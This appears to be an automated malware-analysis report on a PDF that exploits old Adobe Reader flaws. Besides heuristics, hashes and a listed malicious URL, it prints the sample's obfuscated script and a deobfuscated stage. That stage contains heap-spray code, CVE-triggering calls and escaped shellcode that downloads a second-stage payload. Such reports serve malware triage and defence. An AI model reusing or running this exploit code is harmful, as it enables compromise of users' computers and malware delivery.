Malicious PDF — malware analysis report

Static analysis result for SHA-256 0f5a96db4de89c94…

MALICIOUS

PDF

21.1 KB Created: 2012-09-17 23:33:20 +04:00 Authoring application: Adobe Acrobat 10.0 (via Acrobat Web Capture 10.0)
MD5: 2697e31eb6dbd22e64461a53746d7553 SHA-1: 2d4f56f4f19ae61203bc4cb16e9664a2fa4d3c7d SHA-256: 0f5a96db4de89c9499491a8836ead6cc35d547a580b0e7c7da96b6bdafb066cd
558 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF contains embedded JavaScript that leverages multiple CVEs to execute code. The JavaScript is obfuscated but ultimately contains a URL that is used to download a shellcode payload. This indicates a multi-stage attack where the PDF serves as the initial dropper.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 13

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • ClamAV: Pdf.Exploit.CoolExploitKit-6308636-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.CoolExploitKit-6308636-0
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Base-N pair JavaScript stager high PDF_BASE_N_PAIR_JS_STAGER
    PDF JavaScript stores a long payload as character pairs decoded with parseInt(radix) and String.fromCharCode, then evals the result. The decoder only handles bounded pair tables and only fires when the recovered stage contains exploit-like JavaScript.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://elexvidster.me/discussing/widespread_obtaining_fingers.php?qvdosya=1o:1g:33:31:1f&mfwzvfw=1f:1l:1n:1h:30:1m:1j:1h:32:1i&pgy=1h&tlndn=fgzify&efa=tgxte Referenced by PDF JavaScript
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://www.iec.chIn PDF document text

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0019_000.js
75a6a0963753a94970583a2793f9fd0e16f93451ca8e0b63c6b1de1cdf09e56f		 pdf-javascript-stream PDF /JS object 19 at offset 0x487 9378 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
zxc='a';
a='353d3m3'+zxc+'1u18163o1p1k1n1n163o3936381l163o1p1m3936163o1o1m381l163o381q1k1l163o1k1k1m39163o1n1l361h163o1l1h1p35163o1p351k1h163o1h361l1h163o1o1h1p35163o1m1n1i36163o1o1n1p35163o1k1k1h1p163o1n1n3735163o1m381p35163o1h1k1k36163o1k1k1o1l163o1p1i1j36163o1i1m3838163o39391i1h163o351p3939163o1l1h1p35163o361k1k1h163o1k1q1l1n163o1o1m1h1n163o1p1o3935163o1j1l1k1l163o381l1p1m163o1m1i1o1m163o3835381q163o1m1i1l36163o1p351m1n163o1k361o1m163o1o1l1p35163o1o1p1k1m163o391m1h1k163o1p351m1n163o1j1h1o1n163o391m1h1k163o361q1k1k163o1l1i1l1q163o34373936163o361m1h1k163o37351k1k163o35381h39163o1k1p1i1h163o1o1l391j163o361i1h1p163o1h373635163o37341h1k163o38351l1h163o1k35391i163o1o1m1i39163o1m38381n163o1m381p35163o1h1k1j1l163o1n1n3737163o1h361p35163o1p371l35163o38361l1n163o1m1l3939163o1h361j1l163o371p1p35163o37371h1k163o1h1l1p35163o1h1k1p35163o3435361m163o1m1q1m38163o3835361k163o34371m1k163o1n1p1p35163o1p1h1j1h163o1h361o37163o1o1l1k1k163o1q1n1h1k163o391k3835163o1n1p1p35163o1p351h1p163o1n34391o163o1m1q1h1m163o1q1p381p163o39393939163o381j3939163o381p391q163o1h1h1h1h163o1h1h1h1h163o1m1h1m1p163o1l1h1n34163o39391n1p163o1h1h1h1h163o1m1h1h1h163o361h1p1k163o1m1h1i1q163o1p351m1m163o1p353836163o1i1h1m38163o361k1p1k163o39391h1m163o1n1p381k163o1n381n39163o1h1h1h1h163o1o1m1n1p163o1n361o1j163o1m1l1n37163o1i1n3939163o361l1p1k163o1p351h1p163o381p381p163o39391n1i163o39393939163o1h1j3835163o1o1j3835163o38361p1i163o1h1i1h1l163o1h1h1h1h163o1m361p37163o1h361j1l163o1h1l361o163o1o1j1j1l163o1n1o1n1m163o361o1o1k163o1j1l1l1l163o1o1n1h1l163o1k1k1o1j163o361o1k1j163o1j1l1l1l163o1j1h1h1p163o1o1k1j37163o1m1k1j1h163o391p1n1p163o1h1h1h1h163o39391h1h163o1h361m1n163o381p1p35163o361q1k1k163o361o1m1i163o1i371l1l163o1o1o1h1h163o1n1j1o1h163o361o1o1l163o1i371l1l163o1j381h1m163o1n361n1l163o361n1n36163o1i371l1l163o1h1h1h1q163o1p341m1q163o1h1l361i163o1p1p1k1h163o1i371l1l163o1l1i1h1l163o1n341m1i163o1n341h1h163o1m1k1h1h163o1n341m1o163o39391h1h163o1i1l1m1n163o361h1p1m163o1i1n1o1m163o1h1h1n34163o39391m1k163o1h1l1m1n163o1h1h1n34163o38351p1k163o1m1k1h36163o1m1n3939163o1p1k1h1l163o1h36361k163o1h1j3835163o1i1k3835163o1p1h1l1o163o1h1h1k39163o39341o1m163o1p1h1l1o163o1h1h1k39163o361l1o1m163o1h1h1n34163o39381n34163o1m1n3939163o381p1h1p163o39381q36163o39393939163o1l381p38163o38361h38163o39381q1p163o1h381p34163o1n391p1q163o35371h1i163o36341k1k163o1m351p34163o361n1i35163o1o1q1l1n163o1i341k1n163o1o1h1j39163o1o1l1n1p163o1o1h1o1l163o1j391k34163o1n1m1j39163o1n1m1n36163o1o1n1o1p163o1n1l1n1q163o1o1l1o1k163o1o1j1n1m163o1n371j38163o1j391n1m163o1n1q1n1l163o1n1k1o1k163o1o1k1o1m163o1n1q1o1k163o1n1o1n38163o1o1o1j39163o1n1l1n1q163o1o1k1n1m163o1o1j1o1h163o1n1i1n1m163o1m391n1l163o1n1j1n39163o1n1i1o1l163o1n381n1q163o1n381n1q163o1m391n1o163o1n1q1n1n163o1n1o1n38163o1o1j1n1m163o1j381o1k163o1n1p1o1h163o1k391o1h163o1o1n1o1i163o1n391n1l163o1o1q1o1k163o1k371n1i163o1n391k1i163o1k1i1k34163o1k341n1o163o1k1k1k1k163o1k1k1k34163o1k341k1i163o1n1n1k1i163o1n371j1n163o1o1o1n1n163o1o1n1o34163o1o1o1n1n163o1k1i1k37163o1k341n1n163o1n361k1i163o1k1i1k34163o1k341n38163o1n1p1k1i163o1k1k1k34163o1k341k1h163o1n371k1i163o1k1i1k34163o1k341n34163o1n1p1k1i163o1k1k1k34163o1k341k1j163o1n1q1k1i163o1o1h1j1n163o1o1q1n1o163o1k1i1k37163o1j1n1n1p163o1n361o1l163o1n1l1n38163o1k371n38163o1n1o1n1n163o1n1q1o34163o1o1q1n1n163o1n1m1j1n163o1n1i1n1n163o1o1l1k37163o1o1p1n1o163o1n1m1o1l163o1h1h1h1h181s393o3h363n3c3i3h11383t3p3l193l341d3k3s1'+zxc+'3u3q3b3c3f38193l341f3f383h3'+zxc+'3n3b1b1j1t3k3s1'+zxc+'3u3l341c1u3l34413l341u3l341f3m3o353m3n3l3c3h3'+zxc+'191h1d3k3s1g1j1'+zxc+'1s3l383n3o3l3h113l3441393o3h363n3c3i3h11353r191'+zxc+'3u3p343l11373e3'+zxc+'1u3h383q11233l3l343s191'+zxc+'1s3p343l113p3q1u1h3r1h361h361h361h361s3p343l113437373l1u1h3r1l1h1h1h1h1h1s3p343l113j343s3f3i34371u3o3h383m36343j3819353d3m3'+zxc+'1'+zxc+'1s3p343l113m36323f383h1u3j343s3f3i34371f3f383h3'+zxc+'3n3b1b1j1s3p343l113k3s1u3437373l1e193m36323f383h1c1h3r1k1p1'+zxc+'1s3p343l113s343l3m3j1u3o3h383m36343j381913163o1q1h1q1h163o1q1h1q1h131'+zxc+'1s3s343l3m3j1u383t3p3l193s343l3m3j1d3k3s1'+zxc+'1s3p343l11363i3o3h3n1j1u193p3q1e1h3r1l1h1h1h1h1h1'+zxc+'1g3437373l1s393i3l193p343l11363i3o3h3n1u1h1s363i3o3h3
... (truncated)
base_n_pair_stage_000.js
c5aa0fac8ffa9b6f9b5872dacdad22bbc754082991f2793011d5a440c0a61714		 deobfuscated-js base-31 pair decoded JavaScript at offset 0x495 4173 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u652f%u656c%u7678%u6469%u7473%u7265%u6d2e%u2f65%u6964%u6373%u7375%u6973%u676e%u772f%u6469%u7365%u7270%u6165%u5f64%u626f%u6174%u6e69%u6e69%u5f67%u6966%u676e%u7265%u2e73%u6870%u3f70%u7671%u6f64%u7973%u3d61%u6f31%u313a%u3a67%u3333%u333a%u3a31%u6631%u6d26%u7766%u767a%u7766%u313d%u3a66%u6c31%u313a%u3a6e%u6831%u333a%u3a30%u6d31%u313a%u3a6a%u6831%u333a%u3a32%u6931%u7026%u7967%u313d%u2668%u6c74%u646e%u3d6e%u6766%u697a%u7966%u6526%u6166%u743d%u7867%u6574%u0000';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra}ra=ra.substring(0,qy/2);return ra}function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload}var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow}this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow})}function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock}fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock}mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock}var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num)}function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload}var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw}tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw)}}aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version}}if((lv==9)||((sv==8)&&(lv<=8.12))){geticon()}else if(lv==7.1){printf()}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx()}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date())}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version}}if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d}d=d.substr(0,0x8000-e.length);for(f=
... (truncated)
icc_00_off00002fe8.icc
653b586c4707574ffcd648ba35494daed2c76ceafcf4c07d315ed961b1dc347f		 pdf-icc-profile PDF ICC profile at offset 0x2FE8 408 bytes
icc_01_off00003283.icc
2b3aa1645779a9e634744faf9b01e9102b0c9b88fd6deced7934df86b949af7e		 pdf-icc-profile PDF ICC profile at offset 0x3283 3144 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.